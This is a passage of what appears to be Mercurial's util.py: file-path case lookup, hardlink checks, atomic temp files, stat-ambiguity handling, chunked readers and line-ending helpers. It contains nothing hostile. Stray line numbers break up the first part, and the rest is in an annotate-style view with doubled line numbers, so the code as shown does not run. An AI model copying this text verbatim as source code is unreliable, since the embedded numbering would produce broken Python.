# module-level singleton: util.re.compile / util.re.escape pick the
# fastest available engine (shadows the stdlib name on purpose; the
# stdlib module itself is available as remod)
re = _re()

# per-directory cache for fspath(): normcased name -> on-disk name
_fspathcache = {}
2214
2215
2215
2216
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''

    def _makefspathcacheentry(dir):
        # map normcased entry name -> actual on-disk spelling
        return {normcase(n): n for n in os.listdir(dir)}

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    # Fix: bytes are immutable, so the result of replace() must be kept —
    # previously it was discarded, leaving '\' unescaped inside the regex
    # character classes below (where '\/' collapses to '/').
    seps = seps.replace(b'\\', b'\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            # separator runs are passed through unchanged
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patches of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        # fall back to the normcased spelling if the entry vanished
        result.append(found or part)
        dir = os.path.join(dir, part)

    return b''.join(result)
2258
2259
2259
2260
def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1, f2, fp = None, None, None
    try:
        # create a scratch file next to testfile (same filesystem)...
        fd, f1 = pycompat.mkstemp(
            prefix=b'.%s-' % os.path.basename(testfile),
            suffix=b'1~',
            dir=os.path.dirname(testfile),
        )
        os.close(fd)
        f2 = b'%s2~' % f1[:-2]

        # ...hardlink it, then see whether the link count reflects that
        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        # best-effort cleanup of the scratch files
        if fp is not None:
            fp.close()
        for f in (f1, f2):
            try:
                if f is not None:
                    os.unlink(f)
            except OSError:
                pass
2291
2292
2292
2293
def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    if path.endswith(pycompat.ossep):
        return True
    altsep = pycompat.osaltsep
    # preserve the original short-circuit value when altsep is unset
    return altsep and path.endswith(altsep)
2300
2301
2301
2302
def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative of simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if need.'''
    sep = pycompat.ossep
    return path.split(sep)
2309
2310
2310
2311
def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode, enforcewritable)

    if emptyok:
        # caller will overwrite the contents anyway: skip the copy
        return temp
    try:
        try:
            ifp = posixfile(name, b"rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                # source doesn't exist: an empty temp file is the copy
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, b"wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except:  # re-raises
        # don't leave a half-written temp file behind on any failure
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp
2352
2353
2353
2354
2354 class filestat(object):
2355 class filestat(object):
2355 """help to exactly detect change of a file
2356 """help to exactly detect change of a file
2356
2357
2357 'stat' attribute is result of 'os.stat()' if specified 'path'
2358 'stat' attribute is result of 'os.stat()' if specified 'path'
2358 exists. Otherwise, it is None. This can avoid preparative
2359 exists. Otherwise, it is None. This can avoid preparative
2359 'exists()' examination on client side of this class.
2360 'exists()' examination on client side of this class.
2360 """
2361 """
2361
2362
2362 def __init__(self, stat):
2363 def __init__(self, stat):
2363 self.stat = stat
2364 self.stat = stat
2364
2365
2365 @classmethod
2366 @classmethod
2366 def frompath(cls, path):
2367 def frompath(cls, path):
2367 try:
2368 try:
2368 stat = os.stat(path)
2369 stat = os.stat(path)
2369 except OSError as err:
2370 except OSError as err:
2370 if err.errno != errno.ENOENT:
2371 if err.errno != errno.ENOENT:
2371 raise
2372 raise
2372 stat = None
2373 stat = None
2373 return cls(stat)
2374 return cls(stat)
2374
2375
2375 @classmethod
2376 @classmethod
2376 def fromfp(cls, fp):
2377 def fromfp(cls, fp):
2377 stat = os.fstat(fp.fileno())
2378 stat = os.fstat(fp.fileno())
2378 return cls(stat)
2379 return cls(stat)
2379
2380
2380 __hash__ = object.__hash__
2381 __hash__ = object.__hash__
2381
2382
2382 def __eq__(self, old):
2383 def __eq__(self, old):
2383 try:
2384 try:
2384 # if ambiguity between stat of new and old file is
2385 # if ambiguity between stat of new and old file is
2385 # avoided, comparison of size, ctime and mtime is enough
2386 # avoided, comparison of size, ctime and mtime is enough
2386 # to exactly detect change of a file regardless of platform
2387 # to exactly detect change of a file regardless of platform
2387 return (
2388 return (
2388 self.stat.st_size == old.stat.st_size
2389 self.stat.st_size == old.stat.st_size
2389 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2390 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2390 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2391 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2391 )
2392 )
2392 except AttributeError:
2393 except AttributeError:
2393 pass
2394 pass
2394 try:
2395 try:
2395 return self.stat is None and old.stat is None
2396 return self.stat is None and old.stat is None
2396 except AttributeError:
2397 except AttributeError:
2397 return False
2398 return False
2398
2399
2399 def isambig(self, old):
2400 def isambig(self, old):
2400 """Examine whether new (= self) stat is ambiguous against old one
2401 """Examine whether new (= self) stat is ambiguous against old one
2401
2402
2402 "S[N]" below means stat of a file at N-th change:
2403 "S[N]" below means stat of a file at N-th change:
2403
2404
2404 - S[n-1].ctime < S[n].ctime: can detect change of a file
2405 - S[n-1].ctime < S[n].ctime: can detect change of a file
2405 - S[n-1].ctime == S[n].ctime
2406 - S[n-1].ctime == S[n].ctime
2406 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2407 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2407 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2408 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2408 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2409 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2409 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2410 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2410
2411
2411 Case (*2) above means that a file was changed twice or more at
2412 Case (*2) above means that a file was changed twice or more at
2412 same time in sec (= S[n-1].ctime), and comparison of timestamp
2413 same time in sec (= S[n-1].ctime), and comparison of timestamp
2413 is ambiguous.
2414 is ambiguous.
2414
2415
2415 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2416 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2416 timestamp is ambiguous".
2417 timestamp is ambiguous".
2417
2418
2418 But advancing mtime only in case (*2) doesn't work as
2419 But advancing mtime only in case (*2) doesn't work as
2419 expected, because naturally advanced S[n].mtime in case (*1)
2420 expected, because naturally advanced S[n].mtime in case (*1)
2420 might be equal to manually advanced S[n-1 or earlier].mtime.
2421 might be equal to manually advanced S[n-1 or earlier].mtime.
2421
2422
2422 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2423 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2423 treated as ambiguous regardless of mtime, to avoid overlooking
2424 treated as ambiguous regardless of mtime, to avoid overlooking
2424 by confliction between such mtime.
2425 by confliction between such mtime.
2425
2426
2426 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2427 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2427 S[n].mtime", even if size of a file isn't changed.
2428 S[n].mtime", even if size of a file isn't changed.
2428 """
2429 """
2429 try:
2430 try:
2430 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2431 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2431 except AttributeError:
2432 except AttributeError:
2432 return False
2433 return False
2433
2434
2434 def avoidambig(self, path, old):
2435 def avoidambig(self, path, old):
2435 """Change file stat of specified path to avoid ambiguity
2436 """Change file stat of specified path to avoid ambiguity
2436
2437
2437 'old' should be previous filestat of 'path'.
2438 'old' should be previous filestat of 'path'.
2438
2439
2439 This skips avoiding ambiguity, if a process doesn't have
2440 This skips avoiding ambiguity, if a process doesn't have
2440 appropriate privileges for 'path'. This returns False in this
2441 appropriate privileges for 'path'. This returns False in this
2441 case.
2442 case.
2442
2443
2443 Otherwise, this returns True, as "ambiguity is avoided".
2444 Otherwise, this returns True, as "ambiguity is avoided".
2444 """
2445 """
2445 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2446 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2446 try:
2447 try:
2447 os.utime(path, (advanced, advanced))
2448 os.utime(path, (advanced, advanced))
2448 except OSError as inst:
2449 except OSError as inst:
2449 if inst.errno == errno.EPERM:
2450 if inst.errno == errno.EPERM:
2450 # utime() on the file created by another user causes EPERM,
2451 # utime() on the file created by another user causes EPERM,
2451 # if a process doesn't have appropriate privileges
2452 # if a process doesn't have appropriate privileges
2452 return False
2453 return False
2453 raise
2454 raise
2454 return True
2455 return True
2455
2456
2456 def __ne__(self, other):
2457 def __ne__(self, other):
2457 return not self == other
2458 return not self == other
2458
2459
2459
2460
2460 class atomictempfile(object):
2461 class atomictempfile(object):
2461 '''writable file object that atomically updates a file
2462 '''writable file object that atomically updates a file
2462
2463
2463 All writes will go to a temporary copy of the original file. Call
2464 All writes will go to a temporary copy of the original file. Call
2464 close() when you are done writing, and atomictempfile will rename
2465 close() when you are done writing, and atomictempfile will rename
2465 the temporary copy to the original name, making the changes
2466 the temporary copy to the original name, making the changes
2466 visible. If the object is destroyed without being closed, all your
2467 visible. If the object is destroyed without being closed, all your
2467 writes are discarded.
2468 writes are discarded.
2468
2469
2469 checkambig argument of constructor is used with filestat, and is
2470 checkambig argument of constructor is used with filestat, and is
2470 useful only if target file is guarded by any lock (e.g. repo.lock
2471 useful only if target file is guarded by any lock (e.g. repo.lock
2471 or repo.wlock).
2472 or repo.wlock).
2472 '''
2473 '''
2473
2474
2474 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2475 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2475 self.__name = name # permanent name
2476 self.__name = name # permanent name
2476 self._tempname = mktempcopy(
2477 self._tempname = mktempcopy(
2477 name,
2478 name,
2478 emptyok=(b'w' in mode),
2479 emptyok=(b'w' in mode),
2479 createmode=createmode,
2480 createmode=createmode,
2480 enforcewritable=(b'w' in mode),
2481 enforcewritable=(b'w' in mode),
2481 )
2482 )
2482
2483
2483 self._fp = posixfile(self._tempname, mode)
2484 self._fp = posixfile(self._tempname, mode)
2484 self._checkambig = checkambig
2485 self._checkambig = checkambig
2485
2486
2486 # delegated methods
2487 # delegated methods
2487 self.read = self._fp.read
2488 self.read = self._fp.read
2488 self.write = self._fp.write
2489 self.write = self._fp.write
2489 self.seek = self._fp.seek
2490 self.seek = self._fp.seek
2490 self.tell = self._fp.tell
2491 self.tell = self._fp.tell
2491 self.fileno = self._fp.fileno
2492 self.fileno = self._fp.fileno
2492
2493
2493 def close(self):
2494 def close(self):
2494 if not self._fp.closed:
2495 if not self._fp.closed:
2495 self._fp.close()
2496 self._fp.close()
2496 filename = localpath(self.__name)
2497 filename = localpath(self.__name)
2497 oldstat = self._checkambig and filestat.frompath(filename)
2498 oldstat = self._checkambig and filestat.frompath(filename)
2498 if oldstat and oldstat.stat:
2499 if oldstat and oldstat.stat:
2499 rename(self._tempname, filename)
2500 rename(self._tempname, filename)
2500 newstat = filestat.frompath(filename)
2501 newstat = filestat.frompath(filename)
2501 if newstat.isambig(oldstat):
2502 if newstat.isambig(oldstat):
2502 # stat of changed file is ambiguous to original one
2503 # stat of changed file is ambiguous to original one
2503 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2504 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2504 os.utime(filename, (advanced, advanced))
2505 os.utime(filename, (advanced, advanced))
2505 else:
2506 else:
2506 rename(self._tempname, filename)
2507 rename(self._tempname, filename)
2507
2508
2508 def discard(self):
2509 def discard(self):
2509 if not self._fp.closed:
2510 if not self._fp.closed:
2510 try:
2511 try:
2511 os.unlink(self._tempname)
2512 os.unlink(self._tempname)
2512 except OSError:
2513 except OSError:
2513 pass
2514 pass
2514 self._fp.close()
2515 self._fp.close()
2515
2516
2516 def __del__(self):
2517 def __del__(self):
2517 if safehasattr(self, '_fp'): # constructor actually did something
2518 if safehasattr(self, '_fp'): # constructor actually did something
2518 self.discard()
2519 self.discard()
2519
2520
2520 def __enter__(self):
2521 def __enter__(self):
2521 return self
2522 return self
2522
2523
2523 def __exit__(self, exctype, excvalue, traceback):
2524 def __exit__(self, exctype, excvalue, traceback):
2524 if exctype is not None:
2525 if exctype is not None:
2525 self.discard()
2526 self.discard()
2526 else:
2527 else:
2527 self.close()
2528 self.close()
2528
2529
2529
2530
2530 def unlinkpath(f, ignoremissing=False, rmdir=True):
2531 def unlinkpath(f, ignoremissing=False, rmdir=True):
2531 """unlink and remove the directory if it is empty"""
2532 """unlink and remove the directory if it is empty"""
2532 if ignoremissing:
2533 if ignoremissing:
2533 tryunlink(f)
2534 tryunlink(f)
2534 else:
2535 else:
2535 unlink(f)
2536 unlink(f)
2536 if rmdir:
2537 if rmdir:
2537 # try removing directories that might now be empty
2538 # try removing directories that might now be empty
2538 try:
2539 try:
2539 removedirs(os.path.dirname(f))
2540 removedirs(os.path.dirname(f))
2540 except OSError:
2541 except OSError:
2541 pass
2542 pass
2542
2543
2543
2544
2544 def tryunlink(f):
2545 def tryunlink(f):
2545 """Attempt to remove a file, ignoring ENOENT errors."""
2546 """Attempt to remove a file, ignoring ENOENT errors."""
2546 try:
2547 try:
2547 unlink(f)
2548 unlink(f)
2548 except OSError as e:
2549 except OSError as e:
2549 if e.errno != errno.ENOENT:
2550 if e.errno != errno.ENOENT:
2550 raise
2551 raise
2551
2552
2552
2553
2553 def makedirs(name, mode=None, notindexed=False):
2554 def makedirs(name, mode=None, notindexed=False):
2554 """recursive directory creation with parent mode inheritance
2555 """recursive directory creation with parent mode inheritance
2555
2556
2556 Newly created directories are marked as "not to be indexed by
2557 Newly created directories are marked as "not to be indexed by
2557 the content indexing service", if ``notindexed`` is specified
2558 the content indexing service", if ``notindexed`` is specified
2558 for "write" mode access.
2559 for "write" mode access.
2559 """
2560 """
2560 try:
2561 try:
2561 makedir(name, notindexed)
2562 makedir(name, notindexed)
2562 except OSError as err:
2563 except OSError as err:
2563 if err.errno == errno.EEXIST:
2564 if err.errno == errno.EEXIST:
2564 return
2565 return
2565 if err.errno != errno.ENOENT or not name:
2566 if err.errno != errno.ENOENT or not name:
2566 raise
2567 raise
2567 parent = os.path.dirname(os.path.abspath(name))
2568 parent = os.path.dirname(os.path.abspath(name))
2568 if parent == name:
2569 if parent == name:
2569 raise
2570 raise
2570 makedirs(parent, mode, notindexed)
2571 makedirs(parent, mode, notindexed)
2571 try:
2572 try:
2572 makedir(name, notindexed)
2573 makedir(name, notindexed)
2573 except OSError as err:
2574 except OSError as err:
2574 # Catch EEXIST to handle races
2575 # Catch EEXIST to handle races
2575 if err.errno == errno.EEXIST:
2576 if err.errno == errno.EEXIST:
2576 return
2577 return
2577 raise
2578 raise
2578 if mode is not None:
2579 if mode is not None:
2579 os.chmod(name, mode)
2580 os.chmod(name, mode)
2580
2581
2581
2582
2582 def readfile(path):
2583 def readfile(path):
2583 with open(path, b'rb') as fp:
2584 with open(path, b'rb') as fp:
2584 return fp.read()
2585 return fp.read()
2585
2586
2586
2587
2587 def writefile(path, text):
2588 def writefile(path, text):
2588 with open(path, b'wb') as fp:
2589 with open(path, b'wb') as fp:
2589 fp.write(text)
2590 fp.write(text)
2590
2591
2591
2592
2592 def appendfile(path, text):
2593 def appendfile(path, text):
2593 with open(path, b'ab') as fp:
2594 with open(path, b'ab') as fp:
2594 fp.write(text)
2595 fp.write(text)
2595
2596
2596
2597
2597 class chunkbuffer(object):
2598 class chunkbuffer(object):
2598 """Allow arbitrary sized chunks of data to be efficiently read from an
2599 """Allow arbitrary sized chunks of data to be efficiently read from an
2599 iterator over chunks of arbitrary size."""
2600 iterator over chunks of arbitrary size."""
2600
2601
2601 def __init__(self, in_iter):
2602 def __init__(self, in_iter):
2602 """in_iter is the iterator that's iterating over the input chunks."""
2603 """in_iter is the iterator that's iterating over the input chunks."""
2603
2604
2604 def splitbig(chunks):
2605 def splitbig(chunks):
2605 for chunk in chunks:
2606 for chunk in chunks:
2606 if len(chunk) > 2 ** 20:
2607 if len(chunk) > 2 ** 20:
2607 pos = 0
2608 pos = 0
2608 while pos < len(chunk):
2609 while pos < len(chunk):
2609 end = pos + 2 ** 18
2610 end = pos + 2 ** 18
2610 yield chunk[pos:end]
2611 yield chunk[pos:end]
2611 pos = end
2612 pos = end
2612 else:
2613 else:
2613 yield chunk
2614 yield chunk
2614
2615
2615 self.iter = splitbig(in_iter)
2616 self.iter = splitbig(in_iter)
2616 self._queue = collections.deque()
2617 self._queue = collections.deque()
2617 self._chunkoffset = 0
2618 self._chunkoffset = 0
2618
2619
2619 def read(self, l=None):
2620 def read(self, l=None):
2620 """Read L bytes of data from the iterator of chunks of data.
2621 """Read L bytes of data from the iterator of chunks of data.
2621 Returns less than L bytes if the iterator runs dry.
2622 Returns less than L bytes if the iterator runs dry.
2622
2623
2623 If size parameter is omitted, read everything"""
2624 If size parameter is omitted, read everything"""
2624 if l is None:
2625 if l is None:
2625 return b''.join(self.iter)
2626 return b''.join(self.iter)
2626
2627
2627 left = l
2628 left = l
2628 buf = []
2629 buf = []
2629 queue = self._queue
2630 queue = self._queue
2630 while left > 0:
2631 while left > 0:
2631 # refill the queue
2632 # refill the queue
2632 if not queue:
2633 if not queue:
2633 target = 2 ** 18
2634 target = 2 ** 18
2634 for chunk in self.iter:
2635 for chunk in self.iter:
2635 queue.append(chunk)
2636 queue.append(chunk)
2636 target -= len(chunk)
2637 target -= len(chunk)
2637 if target <= 0:
2638 if target <= 0:
2638 break
2639 break
2639 if not queue:
2640 if not queue:
2640 break
2641 break
2641
2642
2642 # The easy way to do this would be to queue.popleft(), modify the
2643 # The easy way to do this would be to queue.popleft(), modify the
2643 # chunk (if necessary), then queue.appendleft(). However, for cases
2644 # chunk (if necessary), then queue.appendleft(). However, for cases
2644 # where we read partial chunk content, this incurs 2 dequeue
2645 # where we read partial chunk content, this incurs 2 dequeue
2645 # mutations and creates a new str for the remaining chunk in the
2646 # mutations and creates a new str for the remaining chunk in the
2646 # queue. Our code below avoids this overhead.
2647 # queue. Our code below avoids this overhead.
2647
2648
2648 chunk = queue[0]
2649 chunk = queue[0]
2649 chunkl = len(chunk)
2650 chunkl = len(chunk)
2650 offset = self._chunkoffset
2651 offset = self._chunkoffset
2651
2652
2652 # Use full chunk.
2653 # Use full chunk.
2653 if offset == 0 and left >= chunkl:
2654 if offset == 0 and left >= chunkl:
2654 left -= chunkl
2655 left -= chunkl
2655 queue.popleft()
2656 queue.popleft()
2656 buf.append(chunk)
2657 buf.append(chunk)
2657 # self._chunkoffset remains at 0.
2658 # self._chunkoffset remains at 0.
2658 continue
2659 continue
2659
2660
2660 chunkremaining = chunkl - offset
2661 chunkremaining = chunkl - offset
2661
2662
2662 # Use all of unconsumed part of chunk.
2663 # Use all of unconsumed part of chunk.
2663 if left >= chunkremaining:
2664 if left >= chunkremaining:
2664 left -= chunkremaining
2665 left -= chunkremaining
2665 queue.popleft()
2666 queue.popleft()
2666 # offset == 0 is enabled by block above, so this won't merely
2667 # offset == 0 is enabled by block above, so this won't merely
2667 # copy via ``chunk[0:]``.
2668 # copy via ``chunk[0:]``.
2668 buf.append(chunk[offset:])
2669 buf.append(chunk[offset:])
2669 self._chunkoffset = 0
2670 self._chunkoffset = 0
2670
2671
2671 # Partial chunk needed.
2672 # Partial chunk needed.
2672 else:
2673 else:
2673 buf.append(chunk[offset : offset + left])
2674 buf.append(chunk[offset : offset + left])
2674 self._chunkoffset += left
2675 self._chunkoffset += left
2675 left -= chunkremaining
2676 left -= chunkremaining
2676
2677
2677 return b''.join(buf)
2678 return b''.join(buf)
2678
2679
2679
2680
2680 def filechunkiter(f, size=131072, limit=None):
2681 def filechunkiter(f, size=131072, limit=None):
2681 """Create a generator that produces the data in the file size
2682 """Create a generator that produces the data in the file size
2682 (default 131072) bytes at a time, up to optional limit (default is
2683 (default 131072) bytes at a time, up to optional limit (default is
2683 to read all data). Chunks may be less than size bytes if the
2684 to read all data). Chunks may be less than size bytes if the
2684 chunk is the last chunk in the file, or the file is a socket or
2685 chunk is the last chunk in the file, or the file is a socket or
2685 some other type of file that sometimes reads less data than is
2686 some other type of file that sometimes reads less data than is
2686 requested."""
2687 requested."""
2687 assert size >= 0
2688 assert size >= 0
2688 assert limit is None or limit >= 0
2689 assert limit is None or limit >= 0
2689 while True:
2690 while True:
2690 if limit is None:
2691 if limit is None:
2691 nbytes = size
2692 nbytes = size
2692 else:
2693 else:
2693 nbytes = min(limit, size)
2694 nbytes = min(limit, size)
2694 s = nbytes and f.read(nbytes)
2695 s = nbytes and f.read(nbytes)
2695 if not s:
2696 if not s:
2696 break
2697 break
2697 if limit:
2698 if limit:
2698 limit -= len(s)
2699 limit -= len(s)
2699 yield s
2700 yield s
2700
2701
2701
2702
2702 class cappedreader(object):
2703 class cappedreader(object):
2703 """A file object proxy that allows reading up to N bytes.
2704 """A file object proxy that allows reading up to N bytes.
2704
2705
2705 Given a source file object, instances of this type allow reading up to
2706 Given a source file object, instances of this type allow reading up to
2706 N bytes from that source file object. Attempts to read past the allowed
2707 N bytes from that source file object. Attempts to read past the allowed
2707 limit are treated as EOF.
2708 limit are treated as EOF.
2708
2709
2709 It is assumed that I/O is not performed on the original file object
2710 It is assumed that I/O is not performed on the original file object
2710 in addition to I/O that is performed by this instance. If there is,
2711 in addition to I/O that is performed by this instance. If there is,
2711 state tracking will get out of sync and unexpected results will ensue.
2712 state tracking will get out of sync and unexpected results will ensue.
2712 """
2713 """
2713
2714
2714 def __init__(self, fh, limit):
2715 def __init__(self, fh, limit):
2715 """Allow reading up to <limit> bytes from <fh>."""
2716 """Allow reading up to <limit> bytes from <fh>."""
2716 self._fh = fh
2717 self._fh = fh
2717 self._left = limit
2718 self._left = limit
2718
2719
2719 def read(self, n=-1):
2720 def read(self, n=-1):
2720 if not self._left:
2721 if not self._left:
2721 return b''
2722 return b''
2722
2723
2723 if n < 0:
2724 if n < 0:
2724 n = self._left
2725 n = self._left
2725
2726
2726 data = self._fh.read(min(n, self._left))
2727 data = self._fh.read(min(n, self._left))
2727 self._left -= len(data)
2728 self._left -= len(data)
2728 assert self._left >= 0
2729 assert self._left >= 0
2729
2730
2730 return data
2731 return data
2731
2732
2732 def readinto(self, b):
2733 def readinto(self, b):
2733 res = self.read(len(b))
2734 res = self.read(len(b))
2734 if res is None:
2735 if res is None:
2735 return None
2736 return None
2736
2737
2737 b[0 : len(res)] = res
2738 b[0 : len(res)] = res
2738 return len(res)
2739 return len(res)
2739
2740
2740
2741
2741 def unitcountfn(*unittable):
2742 def unitcountfn(*unittable):
2742 '''return a function that renders a readable count of some quantity'''
2743 '''return a function that renders a readable count of some quantity'''
2743
2744
2744 def go(count):
2745 def go(count):
2745 for multiplier, divisor, format in unittable:
2746 for multiplier, divisor, format in unittable:
2746 if abs(count) >= divisor * multiplier:
2747 if abs(count) >= divisor * multiplier:
2747 return format % (count / float(divisor))
2748 return format % (count / float(divisor))
2748 return unittable[-1][2] % count
2749 return unittable[-1][2] % count
2749
2750
2750 return go
2751 return go
2751
2752
2752
2753
2753 def processlinerange(fromline, toline):
2754 def processlinerange(fromline, toline):
2754 """Check that linerange <fromline>:<toline> makes sense and return a
2755 """Check that linerange <fromline>:<toline> makes sense and return a
2755 0-based range.
2756 0-based range.
2756
2757
2757 >>> processlinerange(10, 20)
2758 >>> processlinerange(10, 20)
2758 (9, 20)
2759 (9, 20)
2759 >>> processlinerange(2, 1)
2760 >>> processlinerange(2, 1)
2760 Traceback (most recent call last):
2761 Traceback (most recent call last):
2761 ...
2762 ...
2762 ParseError: line range must be positive
2763 ParseError: line range must be positive
2763 >>> processlinerange(0, 5)
2764 >>> processlinerange(0, 5)
2764 Traceback (most recent call last):
2765 Traceback (most recent call last):
2765 ...
2766 ...
2766 ParseError: fromline must be strictly positive
2767 ParseError: fromline must be strictly positive
2767 """
2768 """
2768 if toline - fromline < 0:
2769 if toline - fromline < 0:
2769 raise error.ParseError(_(b"line range must be positive"))
2770 raise error.ParseError(_(b"line range must be positive"))
2770 if fromline < 1:
2771 if fromline < 1:
2771 raise error.ParseError(_(b"fromline must be strictly positive"))
2772 raise error.ParseError(_(b"fromline must be strictly positive"))
2772 return fromline - 1, toline
2773 return fromline - 1, toline
2773
2774
2774
2775
2775 bytecount = unitcountfn(
2776 bytecount = unitcountfn(
2776 (100, 1 << 30, _(b'%.0f GB')),
2777 (100, 1 << 30, _(b'%.0f GB')),
2777 (10, 1 << 30, _(b'%.1f GB')),
2778 (10, 1 << 30, _(b'%.1f GB')),
2778 (1, 1 << 30, _(b'%.2f GB')),
2779 (1, 1 << 30, _(b'%.2f GB')),
2779 (100, 1 << 20, _(b'%.0f MB')),
2780 (100, 1 << 20, _(b'%.0f MB')),
2780 (10, 1 << 20, _(b'%.1f MB')),
2781 (10, 1 << 20, _(b'%.1f MB')),
2781 (1, 1 << 20, _(b'%.2f MB')),
2782 (1, 1 << 20, _(b'%.2f MB')),
2782 (100, 1 << 10, _(b'%.0f KB')),
2783 (100, 1 << 10, _(b'%.0f KB')),
2783 (10, 1 << 10, _(b'%.1f KB')),
2784 (10, 1 << 10, _(b'%.1f KB')),
2784 (1, 1 << 10, _(b'%.2f KB')),
2785 (1, 1 << 10, _(b'%.2f KB')),
2785 (1, 1, _(b'%.0f bytes')),
2786 (1, 1, _(b'%.0f bytes')),
2786 )
2787 )
2787
2788
2788
2789
2789 class transformingwriter(object):
2790 class transformingwriter(object):
2790 """Writable file wrapper to transform data by function"""
2791 """Writable file wrapper to transform data by function"""
2791
2792
2792 def __init__(self, fp, encode):
2793 def __init__(self, fp, encode):
2793 self._fp = fp
2794 self._fp = fp
2794 self._encode = encode
2795 self._encode = encode
2795
2796
2796 def close(self):
2797 def close(self):
2797 self._fp.close()
2798 self._fp.close()
2798
2799
2799 def flush(self):
2800 def flush(self):
2800 self._fp.flush()
2801 self._fp.flush()
2801
2802
2802 def write(self, data):
2803 def write(self, data):
2803 return self._fp.write(self._encode(data))
2804 return self._fp.write(self._encode(data))
2804
2805
2805
2806
2806 # Matches a single EOL which can either be a CRLF where repeated CR
2807 # Matches a single EOL which can either be a CRLF where repeated CR
2807 # are removed or a LF. We do not care about old Macintosh files, so a
2808 # are removed or a LF. We do not care about old Macintosh files, so a
2808 # stray CR is an error.
2809 # stray CR is an error.
2809 _eolre = remod.compile(br'\r*\n')
2810 _eolre = remod.compile(br'\r*\n')
2810
2811
2811
2812
2812 def tolf(s):
2813 def tolf(s):
2813 return _eolre.sub(b'\n', s)
2814 return _eolre.sub(b'\n', s)
2814
2815
2815
2816
2816 def tocrlf(s):
2817 def tocrlf(s):
2817 return _eolre.sub(b'\r\n', s)
2818 return _eolre.sub(b'\r\n', s)
2818
2819
2819
2820
2820 def _crlfwriter(fp):
2821 def _crlfwriter(fp):
2821 return transformingwriter(fp, tocrlf)
2822 return transformingwriter(fp, tocrlf)
2822
2823
2823
2824
2824 if pycompat.oslinesep == b'\r\n':
2825 if pycompat.oslinesep == b'\r\n':
2825 tonativeeol = tocrlf
2826 tonativeeol = tocrlf
2826 fromnativeeol = tolf
2827 fromnativeeol = tolf
2827 nativeeolwriter = _crlfwriter
2828 nativeeolwriter = _crlfwriter
2828 else:
2829 else:
2829 tonativeeol = pycompat.identity
2830 tonativeeol = pycompat.identity
2830 fromnativeeol = pycompat.identity
2831 fromnativeeol = pycompat.identity
2831 nativeeolwriter = pycompat.identity
2832 nativeeolwriter = pycompat.identity
2832
2833
2833 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2834 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2834 3,
2835 3,
2835 0,
2836 0,
2836 ):
2837 ):
2837 # There is an issue in CPython that some IO methods do not handle EINTR
2838 # There is an issue in CPython that some IO methods do not handle EINTR
2838 # correctly. The following table shows what CPython version (and functions)
2839 # correctly. The following table shows what CPython version (and functions)
2839 # are affected (buggy: has the EINTR bug, okay: otherwise):
2840 # are affected (buggy: has the EINTR bug, okay: otherwise):
2840 #
2841 #
